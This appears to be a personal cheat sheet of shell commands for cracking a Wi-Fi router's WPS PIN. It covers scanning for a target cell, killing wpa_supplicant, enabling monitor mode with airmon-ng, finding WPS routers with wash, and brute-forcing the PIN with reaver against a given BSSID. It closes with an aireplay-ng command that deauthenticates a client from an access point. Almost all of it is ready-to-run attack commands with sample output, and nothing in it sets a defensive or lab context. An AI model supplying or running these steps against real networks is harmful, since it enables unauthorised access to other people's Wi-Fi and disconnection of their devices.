# iwlist wlp2s0 scan
# iwconfig wlp2s0 essid name_of_network
To get the MAC address of the target cell;
# iwlist wlp2s0 scan
Example output that matters;
Cell 03 - Address: A8:A6:68:98:0C:C5
First check for processes that interfere with the state of the interface and kill them;
# airmon-ng check
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
1271    wpa_supplicant
1576    wpa_supplicant
1633    dhclient
Process with PID 1576 (wpa_supplicant) is running on interface wlan0
Process with PID 1633 (dhclient) is running on interface wlan0
pkill or kill all of them, e.g. 1271;
# kill -15 1271
If that fails;
# kill -9 1271
If the wireless card is Intel, reload the driver;
# rmmod iwlmvm
# rmmod iwlwifi
# modprobe iwlwifi
Put the interface in monitor mode;
# iwconfig wlp2s0 mode monitor
# ifconfig wlp2s0 up
# airmon-ng start wlp2s0

Interface       Chipset         Driver
wlp2s0          Intel AC        iwlwifi - [phy1]
                                (monitor mode enabled on mon0)
airodump-ng does not report whether a router has WPS enabled or not; wash is used for that;
# wash -i wlp2s0
If the program reports "Found packet with bad FCS", run it with -C (ignore FCS errors);
# wash -C -i wlp2s0
Put mon0 on the same channel as the target cell;
# iwconfig mon0 channel 6
Start the magic;
# reaver -i mon0 -b A8:A6:68:98:0C:C5 -c 6 -vv
If the BSSID is cloaked (not being broadcast), provide it to reaver with -e;
# reaver -i mon0 -b A8:A6:68:98:0C:C5 -c 6 -e "bssid_name" -vv
Deauthenticate a client (-a is the address of the access point, -c is the client to deauthenticate, -0 1 sends one deauth burst);
# aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0